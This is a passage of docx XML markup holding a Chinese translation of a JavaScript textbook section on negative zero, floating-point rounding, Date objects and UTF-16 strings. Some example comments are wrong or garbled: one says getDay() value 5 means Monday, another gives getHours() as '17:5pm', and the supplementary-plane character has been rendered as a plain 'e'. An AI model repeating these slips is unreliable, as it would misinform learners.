      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>-Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>的时候返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>负零值同样有些特殊，它和正零值是相等的（甚至使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的严格相等测试来判断）。这意味着这两个值几乎一模一样，除了作为除数之外：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var zero=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>正常的零值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var negz=-0;//</w:t>
      </w:r>
      <w:r>
        <w:t>负零值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>zero===negz//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>正零值和负零值相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>1/zero===1/negz//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>正无穷大和负无穷大不等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="3_1_4_Er_Jin_Zhi_Fu_Dian_Shu_He_Si_She_W"/>
      <w:r>
        <w:t>3.1.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　二进制浮点数和四舍五入错误</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实数有无数个，但</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>通过浮点数的形式只能表示其中有限的个数（确切地说是</w:t>
      </w:r>
      <w:r>
        <w:t>18 437 736</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 874 454 810 627</w:t>
      </w:r>
      <w:r>
        <w:t>个）。也就是说，当在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中使用实数的时候，常常只是真实值的一个近似表示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>采用了</w:t>
      </w:r>
      <w:r>
        <w:t>IEEE-754</w:t>
      </w:r>
      <w:r>
        <w:t>浮点数表示法（几乎所有现代编程语言所采用），这是一种二进制表示法，可以精确地表示分数，比如</w:t>
      </w:r>
      <w:r>
        <w:t>1/2</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>1/8</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>1/1024</w:t>
      </w:r>
      <w:r>
        <w:t>。遗憾的是，我们常用的分数（特别是在金融计算方面）都是十进制分数</w:t>
      </w:r>
      <w:r>
        <w:t>1/10</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>1/100</w:t>
      </w:r>
      <w:r>
        <w:t>等。二进制浮点数表示法并不能精确表示类似</w:t>
      </w:r>
      <w:r>
        <w:t>0.1</w:t>
      </w:r>
      <w:r>
        <w:t>这样简单的数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的数字具有足够的精度，并可以极其近似于</w:t>
      </w:r>
      <w:r>
        <w:t>0.1</w:t>
      </w:r>
      <w:r>
        <w:t>。但事实是，数字</w:t>
      </w:r>
      <w:r>
        <w:t>不能精确表述的确带来了一些问题。看下这段代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=.3-.2;//30</w:t>
      </w:r>
      <w:r>
        <w:t>美分减去</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>美分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var y=.2-.1;//20</w:t>
      </w:r>
      <w:r>
        <w:t>美分减去</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>美分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x==y//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>两值不相等</w:t>
      </w:r>
      <w:r>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x==.1//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:.3-.2</w:t>
      </w:r>
      <w:r>
        <w:t>不等于</w:t>
      </w:r>
      <w:r>
        <w:t>.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y==.1//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:.2-.1</w:t>
      </w:r>
      <w:r>
        <w:t>等于</w:t>
      </w:r>
      <w:r>
        <w:t>.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于舍入误差，</w:t>
      </w:r>
      <w:r>
        <w:t>0.3</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>0.2</w:t>
      </w:r>
      <w:r>
        <w:t>之间的近似差值实际上并不等于</w:t>
      </w:r>
      <w:r>
        <w:t>0.2</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>0.1</w:t>
      </w:r>
      <w:r>
        <w:t>之间的近似差值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>。这个问题并不只在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中才会出现，理解这一点非常重要：在任何使用二进制浮点数的编程语言中都会有这个问题。同样需要</w:t>
      </w:r>
      <w:r>
        <w:t>注意的是，上述代码中</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>的值非常接近彼此和最终的正确值。这种计算结果可以胜任大多数的计算任务：这个问题也只有在比较两个值是否相等的时候才会出现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的未来版本或许会支持十进制数字类型以避免这些舍入问题。在这之前你可能更愿意使用大整数进行重要的金融计算，例如，要使用整数</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>分</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>而不要使用小数</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>元</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>进行基于货币单位的运算。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="3_1_5_Ri_Qi_He_Shi_Jian_"/>
      <w:r>
        <w:t>3.1.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　日期和时间</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心包括</w:t>
      </w:r>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，用来创建表示日期和时间的对象。这些日期对象的方法为日期计算提供了简单的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。日期对象不像数字</w:t>
      </w:r>
      <w:r>
        <w:t>那样是基本数据类型。本节给出了使用日期对象的一个简单教程。在第三部分可以查阅更多细节：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var then=new Date(2011,0,1);//2011</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var later=new Date(2011,0,1,17,10,30);//</w:t>
      </w:r>
      <w:r>
        <w:t>同一天</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>当地时间</w:t>
      </w:r>
      <w:r>
        <w:t>5:10:30pm,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var now=new Date();//</w:t>
      </w:r>
      <w:r>
        <w:t>当前日期和时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var elapsed=now-then;//</w:t>
      </w:r>
      <w:r>
        <w:t>日期减法：计算时间间隔的毫秒数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>later.getFullYear()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>2011</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>later.getMonth()</w:t>
      </w:r>
      <w:r>
        <w:t>//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0:</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>开始计数的月份</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>later.getDate()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>开始计数的天数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>later.getDay()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>5:</w:t>
      </w:r>
      <w:r>
        <w:t>得到星期几，</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>代表星期日，</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>代表星期一</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>later.getHours()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞当地时间</w:t>
      </w:r>
      <w:r>
        <w:t>17:5pm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>later.getUTCHours()//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>UTC</w:t>
      </w:r>
      <w:r>
        <w:t>表示小时的时间，基于时区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="3_2_Wen_Ben_"/>
      <w:r>
        <w:t>3.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　文本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>字符串（</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>）是一组由</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位值组成的不可变的有序序列，每个字符通常来自于</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符集。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>通过字符串类型来表示文本。字符串的长度（</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>）是其所含</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位值的个数。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>字符串（和其数组）的索引从零开始：第一个字符的位置是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，第二个字符的位置是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，以此类推。空字符串（</w:t>
      </w:r>
      <w:r>
        <w:t>empty string</w:t>
      </w:r>
      <w:r>
        <w:t>）长度为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中并没有表示单个字符的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>字符型</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。要表</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>示一个</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位值，只需将其赋值给字符串变量即可，这个字符串长度为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>字符集，内码和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScrip</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>采用</w:t>
      </w:r>
      <w:r>
        <w:t>UTF-16</w:t>
      </w:r>
      <w:r>
        <w:t>编码的</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符集，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>字符串是由一组无符号的</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位值组成的序列。最常用的</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符（这些字符属于</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>基本多语种平面</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>）都是通过</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位的内码表示，并代表字符串中的单个字符，那些不能表示为</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位的</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符则遵循</w:t>
      </w:r>
      <w:r>
        <w:t>UTF-16</w:t>
      </w:r>
      <w:r>
        <w:t>编码规则</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>用两个</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位值组成的一个序列（亦称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>代理项对</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）表示。这意味着一个长度为</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>字符串</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>两个</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位值</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>有可能表示一个</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var p="π";//π</w:t>
      </w:r>
      <w:r>
        <w:t>由</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>位内码表示</w:t>
      </w:r>
      <w:r>
        <w:t>0x03c0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var e="e";//e</w:t>
      </w:r>
      <w:r>
        <w:t>由</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>位内码表示</w:t>
      </w:r>
      <w:r>
        <w:t>0x1d452</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>p.length//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1:p</w:t>
      </w:r>
      <w:r>
        <w:t>包含一个</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.length//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>2:e</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>UTF-16</w:t>
      </w:r>
      <w:r>
        <w:t>编码后包含两个</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位值：</w:t>
      </w:r>
      <w:r>
        <w:t>"\ud835\udc52"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>定义的各式字符串操作方法均作用于</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位值，而非字符，且不会对代理项对做单独处理，同样</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>不会对字符串做标准化的加工，甚至不能保证字符串是合法的</w:t>
      </w:r>
      <w:r>
        <w:t>UTF-16</w:t>
      </w:r>
      <w:r>
        <w:t>格式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="3_2_1_Zi_Fu_Chuan_Zhi_Jie_Liang_"/>
      <w:r>
        <w:t>3.2.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　字符串直接量</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序中的字符串直接量，是由单引号</w:t>
      </w:r>
      <w:r>
        <w:t>或双引号括起来的字符序列。由单引号定界的字符串中可以包含双引号，由双引号定界的字符串中也可以包含单引号。这里有几个字符串直接量的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>""//</w:t>
      </w:r>
      <w:r>
        <w:t>空字符串：它包含</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>个字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>'testing'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"3.14"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>'name="myform"'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"Wouldn't you prefer O'Reilly's book?"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"This string\nhas two lines"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"πis the ratio of a circle's circumference to its diameter"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
